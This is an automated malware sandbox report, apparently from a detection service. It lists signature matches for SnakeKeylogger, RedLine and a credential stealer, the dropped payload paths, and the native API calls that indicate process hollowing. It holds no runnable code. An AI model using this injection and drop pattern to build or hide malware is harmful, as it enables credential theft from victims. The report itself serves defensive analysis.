Source: 14.2.nhpoymuP.pif.25d2a8c6.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.nhpoymuP.pif.25d2a8c6.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.nhpoymuP.pif.2750a8c6.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.nhpoymuP.pif.306ae390.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.nhpoymuP.pif.25d299de.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.nhpoymuP.pif.25d299de.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.nhpoymuP.pif.28470ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.nhpoymuP.pif.28470ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.nhpoymuP.pif.28470ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.nhpoymuP.pif.284d0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.nhpoymuP.pif.2f3499de.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.nhpoymuP.pif.2f3499de.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.nhpoymuP.pif.284d0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.nhpoymuP.pif.2f3499de.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.nhpoymuP.pif.27a00000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.nhpoymuP.pif.27a00000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.nhpoymuP.pif.27a00000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.3.nhpoymuP.pif.2d7ca218.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.3.nhpoymuP.pif.2d7ca218.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.nhpoymuP.pif.2750a8c6.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.nhpoymuP.pif.306ae390.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.nhpoymuP.pif.275099de.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.nhpoymuP.pif.275099de.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.nhpoymuP.pif.323b0000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.nhpoymuP.pif.323b0000.8.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.nhpoymuP.pif.31c30ee8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.nhpoymuP.pif.31c30ee8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.nhpoymuP.pif.31c30ee8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.nhpoymuP.pif.2750a8c6.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.nhpoymuP.pif.306ae390.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.nhpoymuP.pif.2f34a8c6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.image.exe.21e00948.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.nhpoymuP.pif.2f34a8c6.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.nhpoymuP.pif.2f34a8c6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.nhpoymuP.pif.275099de.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.nhpoymuP.pif.323b0000.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.nhpoymuP.pif.30655570.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.nhpoymuP.pif.30655570.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.nhpoymuP.pif.30655570.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.nhpoymuP.pif.2f34a8c6.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.nhpoymuP.pif.2f34a8c6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.nhpoymuP.pif.2f34a8c6.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.nhpoymuP.pif.284d0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.nhpoymuP.pif.284d0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.nhpoymuP.pif.284d0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.nhpoymuP.pif.27840ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.nhpoymuP.pif.27840ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.nhpoymuP.pif.27840ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.3.nhpoymuP.pif.25817960.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.nhpoymuP.pif.28470ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.3.nhpoymuP.pif.25817960.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.nhpoymuP.pif.28470ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.3.nhpoymuP.pif.25817960.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.nhpoymuP.pif.28470ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.nhpoymuP.pif.306ae390.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.nhpoymuP.pif.306ae390.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.nhpoymuP.pif.306ae390.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.nhpoymuP.pif.30656458.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.nhpoymuP.pif.30656458.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.image.exe.21e933d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.nhpoymuP.pif.30656458.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.nhpoymuP.pif.27a00000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.nhpoymuP.pif.27a00000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.nhpoymuP.pif.27a00000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.Pumyophn.PIF.215835b8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.nhpoymuP.pif.275099de.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.nhpoymuP.pif.31c30000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.nhpoymuP.pif.323b0000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.nhpoymuP.pif.31c30000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.nhpoymuP.pif.323b0000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.nhpoymuP.pif.31c30000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.nhpoymuP.pif.30656458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.nhpoymuP.pif.323b0000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.nhpoymuP.pif.30656458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.nhpoymuP.pif.275099de.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.nhpoymuP.pif.27840000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.nhpoymuP.pif.30656458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.nhpoymuP.pif.275099de.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.nhpoymuP.pif.30655570.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.3.nhpoymuP.pif.240bcc58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.nhpoymuP.pif.2750a8c6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.nhpoymuP.pif.27840000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.nhpoymuP.pif.30655570.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.3.nhpoymuP.pif.240bcc58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.nhpoymuP.pif.2750a8c6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.nhpoymuP.pif.27840000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.nhpoymuP.pif.2750a8c6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.nhpoymuP.pif.30655570.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.3.nhpoymuP.pif.240bcc58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000007.00000001.1828156271.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000003.00000001.1710492566.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000007.00000002.2945818229.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000E.00000001.1913774017.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000E.00000002.2945858419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000003.00000002.1965140113.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: nhpoymuP.pif PID: 7416, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: nhpoymuP.pif PID: 7688, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: nhpoymuP.pif PID: 8008, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: image.exe

Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CA824C NtReadVirtualMemory,	0_2_02CA824C
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CA84BC NtUnmapViewOfSection,	0_2_02CA84BC
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CADAC4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_02CADAC4
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CADA3C RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_02CADA3C
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CA8BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_02CA8BA8
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CADBA8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_02CADBA8
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CA79AC NtAllocateVirtualMemory,	0_2_02CA79AC
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CA7CF8 NtWriteVirtualMemory,	0_2_02CA7CF8
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CA8BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_02CA8BA6
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CAD9E8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_02CAD9E8
Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02CA79AA NtAllocateVirtualMemory,	0_2_02CA79AA
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: 4_2_02CB824C NtReadVirtualMemory,	4_2_02CB824C
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: 4_2_02CB84BC NtUnmapViewOfSection,	4_2_02CB84BC
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: 4_2_02CBDAC4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	4_2_02CBDAC4
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: 4_2_02CBDA3C RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	4_2_02CBDA3C
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: 4_2_02CB8BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	4_2_02CB8BA8
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: 4_2_02CBDBA8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	4_2_02CBDBA8
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: 4_2_02CB79AC NtAllocateVirtualMemory,	4_2_02CB79AC
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: 4_2_02CB7CF8 NtWriteVirtualMemory,	4_2_02CB7CF8
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: 4_2_02CB8BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	4_2_02CB8BA6
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: 4_2_02CBD9E8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	4_2_02CBD9E8
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: 4_2_02CB79AA NtAllocateVirtualMemory,	4_2_02CB79AA
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: 9_2_02EE824C NtReadVirtualMemory,	9_2_02EE824C
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: 9_2_02EE84BC NtUnmapViewOfSection,	9_2_02EE84BC
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: 9_2_02EEDAC4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	9_2_02EEDAC4
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: 9_2_02EEDA3C RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	9_2_02EEDA3C
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: 9_2_02EE8BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	9_2_02EE8BA8
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: 9_2_02EEDBA8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	9_2_02EEDBA8
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: 9_2_02EE79AC NtAllocateVirtualMemory,	9_2_02EE79AC
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: 9_2_02EE7CF8 NtWriteVirtualMemory,	9_2_02EE7CF8
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: 9_2_02EE8BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	9_2_02EE8BA6
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: 9_2_02EED9E8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	9_2_02EED9E8
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: 9_2_02EE79AA NtAllocateVirtualMemory,	9_2_02EE79AA

Source: C:\Users\user\Desktop\image.exe

Code function: 0_2_02CA85D4 CreateProcessAsUserW,

0_2_02CA85D4

Source: C:\Users\user\Desktop\image.exe	Code function: 0_2_02C920C4	0_2_02C920C4
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_00408C60	3_2_00408C60
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_0040DC11	3_2_0040DC11
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_00407C3F	3_2_00407C3F
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_00418CCC	3_2_00418CCC
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_00406CA0	3_2_00406CA0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_004028B0	3_2_004028B0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_0041A4BE	3_2_0041A4BE
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_00408C60	3_2_00408C60
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_00418244	3_2_00418244
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_00401650	3_2_00401650
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_00402F20	3_2_00402F20
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_004193C4	3_2_004193C4
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_00418788	3_2_00418788
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_00402F89	3_2_00402F89
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_00402B90	3_2_00402B90
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_004073A0	3_2_004073A0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_2F5512C0	3_2_2F5512C0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_2F5512B0	3_2_2F5512B0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_2F551560	3_2_2F551560
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_32503358	3_2_32503358
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_32502E09	3_2_32502E09
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_325033B5	3_2_325033B5
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_32501C54	3_2_32501C54
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_32502B0E	3_2_32502B0E
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_32502BA5	3_2_32502BA5
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_3250AC70	3_2_3250AC70
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_3250AC60	3_2_3250AC60
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_1_004028B0	3_1_004028B0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_1_00408C60	3_1_00408C60
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_1_00418244	3_1_00418244
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_1_004193C4	3_1_004193C4
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_1_00402B90	3_1_00402B90
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_1_004073A0	3_1_004073A0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_1_00408C60	3_1_00408C60
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_1_0040DC11	3_1_0040DC11
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_1_00407C3F	3_1_00407C3F
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_1_00418CCC	3_1_00418CCC
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_1_00406CA0	3_1_00406CA0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_1_0041A4BE	3_1_0041A4BE
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_1_00401650	3_1_00401650
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_1_00402F20	3_1_00402F20
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_1_00418788	3_1_00418788
